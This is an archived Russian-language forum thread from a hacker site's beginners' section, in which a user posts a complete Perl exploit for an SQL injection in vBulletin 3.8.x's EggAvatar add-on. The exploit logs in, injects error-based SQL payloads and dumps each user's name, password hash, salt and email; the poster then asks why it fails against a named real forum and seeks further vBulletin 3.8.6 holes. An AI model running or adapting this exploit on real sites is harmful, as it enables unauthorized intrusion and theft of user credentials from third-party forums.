Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

vb 3.8.6

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> vb 3.8.6
Имя
Сообщение << Старые топики   Новые топики >>
vb 3.8.6 - 2011-03-18 18:24:31.826666   
dadon123

Сообщений: 3
Оценки: 0
Присоединился: 2011-03-18 18:19:35.703333
Нашел сплоит для vb 3.8.6


#!/usr/bin/env perl
use LWP::UserAgent;
sub banner{
print "###################################\n";
print "############ DSecurity ############\n";
print "###################################\n";
print "# Email:dsecurity.vn[at]gmail.com #\n";
print "###################################\n";
}
if(@ARGV&lt;5){
print "Usage: $0 address username password number_user sleeptime\n";
print "Example: $0 http://localhost/vbb test test 10 10\n";
exit();
}
$ua=LWP::UserAgent-&gt;new();
$ua-&gt;agent("DSecurity");
$ua-&gt;cookie_jar({});
sub login(@){
my $username=shift;
my $password=shift;
my $req = HTTP::Request-&gt;new(POST =&gt; $ARGV[0].'/login.php?do=login');
$req-&gt;content_type('application/x-www-form-urlencoded');
$req-&gt;content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=");
my $res = $ua-&gt;request($req);
}
sub v_request{
#Declare
$print = $_[0];
$select = $_[1];
$from = $_[2];
$where = $_[3];
$limit = $_[4];
$sleep = $ARGV[4];
if ($from eq '') {$from = 'information_schema.tables';}
if ($where eq '') {$where = '1';}
if ($limit eq '') {$limit = '0';}
if ($sleep eq '') {$sleep = '10';}

# Create a request
my $req = HTTP::Request-&gt;new(POST =&gt; $ARGV[0].'/eggavatar.php');
$req-&gt;content_type('application/x-www-form-urlencoded');
$req-&gt;content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select from $from WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)– -'&uid=1&pid=1");
# Pass request to the user agent and get a response back
my $res = $ua-&gt;request($req);
#print $res-&gt;content;
if($res-&gt;content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
{$test = $3};
sleep($sleep);
return $print.$test."\n";
}
&banner;
print "\n#############################################################################################################\n";
print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability #\n";
print "# Date:06-03-2011 #\n";
print "# Author: DSecurity #\n";
print "# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
print "# Version: 2.3.2 #\n";
print "# Tested on: vBulletin 3.8.0 #\n";
print "#############################################################################################################\n";

#login
login($ARGV[1],$ARGV[2]);
#Foot print
print v_request('MySQL version: ','@@version');
print v_request('Data dir: ','@@datadir');
print v_request('User: ','user()');
print v_request('Database: ','database()');
#Get user
for($i=1;$i&lt;=$ARGV[3];$i++){
print "—————————————–\n";
print $id = v_request('ID: ','userid','user','1',$i-1);
if($id =~ /(ID:)\s(.*)/){
print v_request('Group: ','usergroupid','user','userid='.$2);
print v_request('Username: ','username','user','userid='.$2);
print v_request('Password: ','password','user','userid='.$2);
print v_request('Salt: ','salt','user','userid='.$2);
print v_request('Email: ','email','user','userid='.$2);
}

}



Но не могу в нем разобрать, подскажите что надо вводить я ввожу:

4.pl http://zhyk.ru/forum zhyk zhyk 1 10

Но потом Все что выдает версию мускл и тд пустое, в чем моя ошибка?
Post #: 1
RE: vb 3.8.6 - 2011-03-18 18:26:43.750000   
dadon123

Сообщений: 3
Оценки: 0
Присоединился: 2011-03-18 18:19:35.703333
Если еще может кто поделится , есть ли какие еще уязвимости в 3.8.6 , Поиск database , не работает
Post #: 2
Страниц:  [1]
Все форумы >> [Для начинающих] >> vb 3.8.6







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.